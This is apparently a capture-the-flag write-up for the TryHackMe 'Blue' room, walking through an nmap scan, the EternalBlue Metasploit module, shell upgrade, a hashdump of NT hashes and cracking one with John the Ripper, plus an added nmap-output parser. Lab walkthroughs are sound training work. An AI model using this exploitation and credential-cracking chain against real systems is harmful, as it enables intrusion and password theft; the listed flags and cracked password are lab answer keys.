Blue
- Website: TryHackMe
- Level: Easy
- OS: Windows
- Link: Blue
Recon
Question
How many ports are open with a port number under 1000?
Walkthrough
Let's start with a full-port nmap scan (-p-), with --min-rate raised so it finishes quickly:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap --min-rate=10000 10.10.101.136 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-27 11:58 CEST
Warning: 10.10.101.136 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.101.136
Host is up (0.052s latency).
Not shown: 65382 closed tcp ports (reset), 144 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
Only 135, 139 and 445 fall under 1000; 3389 and the five ephemeral RPC ports above 49000 do not count.
Answer
3
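As an added example that is not part of the original writeup: a small Python parser for the port table nmap prints, so the under-1000 count can be checked mechanically and the services a defender would flag as exposed (SMB, NetBIOS session, RDP) pulled out of the same output. The sample input is the port table from the scan above; the function names and the EXPOSED_SERVICES mapping are my own.

```python
import re

# Constructed sample: the port table from the nmap scan above, verbatim.
NMAP_OUTPUT = """\
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
"""

# One nmap port line: "<port>/<proto> <state> <service>" (columns may be space-padded).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Services whose exposure on a host is a standard hardening finding (my mapping).
EXPOSED_SERVICES = {139: "NetBIOS session", 445: "SMB", 3389: "RDP"}


def parse_ports(text):
    """Return one dict per port line; headers and other nmap chatter are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),   # open, closed, filtered, open|filtered ...
                "service": m.group(4),
            })
    return ports


def open_ports_below(text, limit=1000):
    """Open ports with a number strictly below `limit`, in scan order."""
    return [p["port"] for p in parse_ports(text)
            if p["state"] == "open" and p["port"] < limit]


def exposure_findings(text):
    """Open ports that belong to the EXPOSED_SERVICES watch-list."""
    return {p["port"]: EXPOSED_SERVICES[p["port"]] for p in parse_ports(text)
            if p["state"] == "open" and p["port"] in EXPOSED_SERVICES}


if __name__ == "__main__":
    low = open_ports_below(NMAP_OUTPUT)
    print(f"{len(low)} open ports under 1000: {low}")
    for port, name in exposure_findings(NMAP_OUTPUT).items():
        print(f"exposed: {port}/tcp ({name})")
```

The regex only matches lines that start with a port number, so the same function can be fed a whole nmap report (the "Not shown" and "Host is up" lines fall through) rather than a hand-trimmed table.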
Gain Access
Question
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
Walkthrough
Let's search Metasploit for an exploit for EternalBlue (MS17-010):
Answer
exploit/windows/smb/ms17_010_eternalblue
Question
Show options and set the one required value. What is the name of this value? (All caps for submission)
Walkthrough
Let's show the options for the exploit:
Answer
RHOSTS
Escalate
Question
If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Walkthrough
Let's search for the post module:
Answer
post/multi/manage/shell_to_meterpreter
Question
Select this (use MODULE_PATH). Show options, what option are we required to change?
Walkthrough
Let's use the post module:
Answer
SESSION
Cracking
Question
Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Walkthrough
Let's run the command. Administrator (RID 500) and Guest (RID 501) are built-in accounts, so the entry with RID 1000 is the non-default user:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[REDACTED]:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Answer
Jon
Question
Copy this password hash to a file and research how to crack it. What is the cracked password?
Walkthrough
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > hash
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ john hash -w=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=24
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (Jon)
1g 0:00:00:00 DONE (2025-09-27 13:17) 3.225g/s 32904Kp/s 32904Kc/s 32904KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Answer
alqfna22
Find flags!
Question
Flag1? This flag can be found at the system root.
Walkthrough
Answer
flag{access_the_machine}
Question
Flag2? This flag can be found at the location where passwords are stored within Windows.
Walkthrough
Answer
flag{sam_database_elevated_access}
Question
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
Walkthrough
C:\Users\Jon>dir Documents
dir Documents
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
2 Dir(s) 20,329,848,832 bytes free
Answer
flag{admin_documents_can_be_valuable}